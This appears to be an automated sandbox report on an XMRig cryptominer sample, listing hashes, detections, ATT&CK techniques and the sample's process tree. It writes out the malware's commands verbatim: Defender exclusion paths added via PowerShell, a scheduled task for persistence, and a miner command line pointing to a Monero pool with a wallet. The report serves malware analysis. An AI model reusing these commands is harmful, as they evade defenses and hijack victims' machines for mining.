xmrig | 89d97e29a3a8e5b5f1eae6e94ad6f24c03db2cdeac0c08233dd05193ec6c8699

Analysis

max time kernel
149s
max time network
152s
platform
windows7_x64
resource
win7-20230621-en
resource tags

arch:x64arch:x86image:win7-20230621-enlocale:en-usos:windows7-x64system
submitted
01-07-2023 08:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

1.3MB
MD5

07176d129de6501a6c733701ce76fd4e
SHA1

20837ae94fffc7cc9df911f7d0ed23cc9c877007
SHA256

89d97e29a3a8e5b5f1eae6e94ad6f24c03db2cdeac0c08233dd05193ec6c8699
SHA512

8f6325a244181b04f29d301249aa7184d582546ecf35bf00a3fd3c34219464e9bc91be42e9a87177eea9c541df494b1ad77f2f0294b741a8f5c92a570a765465
SSDEEP

12288:pG1mg2jJvz/oxbDXR4Nd9YWYaV+lmI0GNHXzvxkMHafenJ34mUw5G3riXcYwbY2p:pqmLFoP4Nr2H10m0GxKLjSKio

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 11 IoCs

miner

resource	yara_rule
behavioral1/memory/2008-122-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2008-123-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2008-124-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2008-125-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2008-126-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2008-127-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2008-128-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2008-129-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2008-131-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2008-133-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2008-135-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

.NET Reactor proctector 5 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/memory/1284-54-0x0000000000220000-0x0000000000372000-memory.dmp	net_reactor
behavioral1/files/0x000a0000000122d9-87.dat	net_reactor
behavioral1/files/0x000a0000000122d9-89.dat	net_reactor
behavioral1/files/0x000a0000000122d9-90.dat	net_reactor
behavioral1/memory/1332-91-0x0000000000950000-0x0000000000AA2000-memory.dmp	net_reactor

Executes dropped EXE 1 IoCs

pid	Process
1332	RKGME.exe

Loads dropped DLL 1 IoCs

pid	Process
1796	cmd.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1332 set thread context of 2008	1332	RKGME.exe	44

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1616	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1636	timeout.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2044	powershell.exe
1088	powershell.exe
1564	powershell.exe
1212	powershell.exe
1332	RKGME.exe
1332	RKGME.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	1284	file.exe
Token: SeDebugPrivilege	2044	powershell.exe
Token: SeDebugPrivilege	1088	powershell.exe
Token: SeDebugPrivilege	1332	RKGME.exe
Token: SeDebugPrivilege	1564	powershell.exe
Token: SeDebugPrivilege	1212	powershell.exe

Suspicious use of WriteProcessMemory 42 IoCs

description	pid	Process	procid_target
PID 1284 wrote to memory of 1088	1284	file.exe	28
PID 1284 wrote to memory of 1088	1284	file.exe	28
PID 1284 wrote to memory of 1088	1284	file.exe	28
PID 1284 wrote to memory of 2044	1284	file.exe	29
PID 1284 wrote to memory of 2044	1284	file.exe	29
PID 1284 wrote to memory of 2044	1284	file.exe	29
PID 1284 wrote to memory of 1796	1284	file.exe	32
PID 1284 wrote to memory of 1796	1284	file.exe	32
PID 1284 wrote to memory of 1796	1284	file.exe	32
PID 1796 wrote to memory of 1636	1796	cmd.exe	34
PID 1796 wrote to memory of 1636	1796	cmd.exe	34
PID 1796 wrote to memory of 1636	1796	cmd.exe	34
PID 1796 wrote to memory of 1332	1796	cmd.exe	35
PID 1796 wrote to memory of 1332	1796	cmd.exe	35
PID 1796 wrote to memory of 1332	1796	cmd.exe	35
PID 1332 wrote to memory of 1564	1332	RKGME.exe	36
PID 1332 wrote to memory of 1564	1332	RKGME.exe	36
PID 1332 wrote to memory of 1564	1332	RKGME.exe	36
PID 1332 wrote to memory of 1212	1332	RKGME.exe	38
PID 1332 wrote to memory of 1212	1332	RKGME.exe	38
PID 1332 wrote to memory of 1212	1332	RKGME.exe	38
PID 1332 wrote to memory of 1680	1332	RKGME.exe	40
PID 1332 wrote to memory of 1680	1332	RKGME.exe	40
PID 1332 wrote to memory of 1680	1332	RKGME.exe	40
PID 1680 wrote to memory of 1616	1680	cmd.exe	42
PID 1680 wrote to memory of 1616	1680	cmd.exe	42
PID 1680 wrote to memory of 1616	1680	cmd.exe	42
PID 1332 wrote to memory of 2008	1332	RKGME.exe	44
PID 1332 wrote to memory of 2008	1332	RKGME.exe	44
PID 1332 wrote to memory of 2008	1332	RKGME.exe	44
PID 1332 wrote to memory of 2008	1332	RKGME.exe	44
PID 1332 wrote to memory of 2008	1332	RKGME.exe	44
PID 1332 wrote to memory of 2008	1332	RKGME.exe	44
PID 1332 wrote to memory of 2008	1332	RKGME.exe	44
PID 1332 wrote to memory of 2008	1332	RKGME.exe	44
PID 1332 wrote to memory of 2008	1332	RKGME.exe	44
PID 1332 wrote to memory of 2008	1332	RKGME.exe	44
PID 1332 wrote to memory of 2008	1332	RKGME.exe	44
PID 1332 wrote to memory of 2008	1332	RKGME.exe	44
PID 1332 wrote to memory of 2008	1332	RKGME.exe	44
PID 1332 wrote to memory of 2008	1332	RKGME.exe	44
PID 1332 wrote to memory of 2008	1332	RKGME.exe	44

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1284
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1088
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2044
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp76C6.tmp.bat""
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1796
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:1636
- - C:\ProgramData\BackUp\RKGME.exe
    "C:\ProgramData\BackUp\RKGME.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1332
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1564
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1212
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "RKGME" /tr "C:\ProgramData\BackUp\RKGME.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1680
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "RKGME" /tr "C:\ProgramData\BackUp\RKGME.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:1616
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -o xmr-eu1.nanopool.org:14433 -u 87N2CazJHoaY8ofHfhpKfj2SGmfMDHPXkgZNgeArkrabCc8vC81NNzxdN6Rjfemw5TGmZ2vbDrC6wDxqdGf7eqqYVBUpMZD --tls --coin monero --max-cpu-usage=50 --donate-level=1 -opencl
      4⤵
      PID:2008

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\BackUp\RKGME.exe

Filesize
478.1MB

MD5
1106791674a9ce4254b57dc94a54d731

SHA1
d9b41895c0a8b29be260210ba6c92bd65759d341

SHA256
0949bcfdc7627f835d6c63bbfb3533928036dd7b90bf0742e27f01bf72b1fae0

SHA512
874f3e5030110bbd8d9823ba35c20913d89afaeff66e95ec77658f7318890025d93c7b2d7f5dc31ee954caf3ee662e76fa7d927ab42cc7047ade098047dc787e

Download Submit
C:\ProgramData\BackUp\RKGME.exe

Filesize
534.8MB

MD5
d54a63ec590b531fcc4e524393b18794

SHA1
072592970007872cfebcedcb89f767aa67150c81

SHA256
992719bee786d61d5f27a14490ff2820f678a7045626dd7e84697be63ac635fd

SHA512
2b6b70bb54964cd305ee8365d34655fde38248cbe57158f0ef6ec326ae76eec415f774a879acb6698c5ce539de21f94e87b19fa9a110cdcd348005f4e50c903a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp76C6.tmp.bat

Filesize
140B

MD5
88139bf949b404f2feff7ec99a3f8e09

SHA1
99458d4d9e508a49e28330e2ddb53bc27530a48f

SHA256
a865412904abcdea80c50e9c81cbc2eb30d094e1ae7d00441f113c0c15931e16

SHA512
f63e1342ba94bedfb6b32f06d75efdc95800d60d25157678f2ab29d77b078583ce9dcb1d828242308ad21ebfaa8fc8498b0c9d3dbfa30e3b9dcdd485297dbac1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp76C6.tmp.bat

Filesize
140B

MD5
88139bf949b404f2feff7ec99a3f8e09

SHA1
99458d4d9e508a49e28330e2ddb53bc27530a48f

SHA256
a865412904abcdea80c50e9c81cbc2eb30d094e1ae7d00441f113c0c15931e16

SHA512
f63e1342ba94bedfb6b32f06d75efdc95800d60d25157678f2ab29d77b078583ce9dcb1d828242308ad21ebfaa8fc8498b0c9d3dbfa30e3b9dcdd485297dbac1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
85f692224f94b768b6d0f147d74e605a

SHA1
59b79bdf8f6bf03fe50ae1e0af95442c7e60d0fd

SHA256
603cacdf6c829da9b8d94dc09a271bb6eb49b89de774b59779e78d04ad94d239

SHA512
d6270e75c851f95535a26de33adb817585ebfd0d12ec9d09c75fdecfa2ea86d7b97eecf45a3475d00d2923f09ebd0133de54e6d68ae0f8f44e36c7415d80a21c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
85f692224f94b768b6d0f147d74e605a

SHA1
59b79bdf8f6bf03fe50ae1e0af95442c7e60d0fd

SHA256
603cacdf6c829da9b8d94dc09a271bb6eb49b89de774b59779e78d04ad94d239

SHA512
d6270e75c851f95535a26de33adb817585ebfd0d12ec9d09c75fdecfa2ea86d7b97eecf45a3475d00d2923f09ebd0133de54e6d68ae0f8f44e36c7415d80a21c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
85f692224f94b768b6d0f147d74e605a

SHA1
59b79bdf8f6bf03fe50ae1e0af95442c7e60d0fd

SHA256
603cacdf6c829da9b8d94dc09a271bb6eb49b89de774b59779e78d04ad94d239

SHA512
d6270e75c851f95535a26de33adb817585ebfd0d12ec9d09c75fdecfa2ea86d7b97eecf45a3475d00d2923f09ebd0133de54e6d68ae0f8f44e36c7415d80a21c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9FQ92277A7XOCMWJAQDN.temp

Filesize
7KB

MD5
85f692224f94b768b6d0f147d74e605a

SHA1
59b79bdf8f6bf03fe50ae1e0af95442c7e60d0fd

SHA256
603cacdf6c829da9b8d94dc09a271bb6eb49b89de774b59779e78d04ad94d239

SHA512
d6270e75c851f95535a26de33adb817585ebfd0d12ec9d09c75fdecfa2ea86d7b97eecf45a3475d00d2923f09ebd0133de54e6d68ae0f8f44e36c7415d80a21c

Download Submit
\ProgramData\BackUp\RKGME.exe

Filesize
584.8MB

MD5
e51f0d51a44094924a2519a715f6b213

SHA1
597e718efd748c74226d0ff74959e858889c092f

SHA256
552c1f5125280ee8343d44c5b1e7f16799541d6bd80bae282bf9ea9fd3df9beb

SHA512
e8555cdd12dc3c5375440187e61f14f48b4a38b84a5265b08d791b70ff5061dd1ea5c2a9dc2d79b88334e354d10403f64e9760c5283df9d208375fb446d333f8

Download Submit
memory/1088-74-0x00000000023FB000-0x0000000002432000-memory.dmp

Filesize
220KB

Download
memory/1088-73-0x00000000023F0000-0x0000000002470000-memory.dmp

Filesize
512KB

Download
memory/1088-70-0x00000000023F0000-0x0000000002470000-memory.dmp

Filesize
512KB

Download
memory/1088-69-0x00000000023F0000-0x0000000002470000-memory.dmp

Filesize
512KB

Download
memory/1088-65-0x000000001B1B0000-0x000000001B492000-memory.dmp

Filesize
2.9MB

Download
memory/1212-108-0x0000000002920000-0x00000000029A0000-memory.dmp

Filesize
512KB

Download
memory/1212-110-0x0000000002920000-0x00000000029A0000-memory.dmp

Filesize
512KB

Download
memory/1212-111-0x0000000002920000-0x00000000029A0000-memory.dmp

Filesize
512KB

Download
memory/1212-115-0x0000000002920000-0x00000000029A0000-memory.dmp

Filesize
512KB

Download
memory/1284-76-0x000000001BA60000-0x000000001BAE0000-memory.dmp

Filesize
512KB

Download
memory/1284-67-0x000000001BA60000-0x000000001BAE0000-memory.dmp

Filesize
512KB

Download
memory/1284-54-0x0000000000220000-0x0000000000372000-memory.dmp

Filesize
1.3MB

Download
memory/1284-68-0x00000000003A0000-0x00000000003A1000-memory.dmp

Filesize
4KB

Download
memory/1332-92-0x000000001BF40000-0x000000001BFC0000-memory.dmp

Filesize
512KB

Download
memory/1332-93-0x0000000000740000-0x0000000000741000-memory.dmp

Filesize
4KB

Download
memory/1332-91-0x0000000000950000-0x0000000000AA2000-memory.dmp

Filesize
1.3MB

Download
memory/1564-101-0x000000001B420000-0x000000001B702000-memory.dmp

Filesize
2.9MB

Download
memory/1564-114-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download
memory/1564-106-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download
memory/1564-113-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download
memory/1564-107-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

Filesize
32KB

Download
memory/2008-128-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2008-126-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2008-138-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2008-137-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2008-119-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2008-120-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2008-121-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2008-122-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2008-123-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2008-124-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2008-125-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2008-136-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2008-127-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2008-135-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2008-129-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2008-130-0x000007FFFFFD9000-0x000007FFFFFDA000-memory.dmp

Filesize
4KB

Download
memory/2008-131-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2008-133-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2008-134-0x00000000002E0000-0x0000000000300000-memory.dmp

Filesize
128KB

Download
memory/2044-75-0x000000000241B000-0x0000000002452000-memory.dmp

Filesize
220KB

Download
memory/2044-71-0x0000000002410000-0x0000000002490000-memory.dmp

Filesize
512KB

Download
memory/2044-66-0x00000000023E0000-0x00000000023E8000-memory.dmp

Filesize
32KB

Download
memory/2044-72-0x0000000002410000-0x0000000002490000-memory.dmp

Filesize
512KB

Download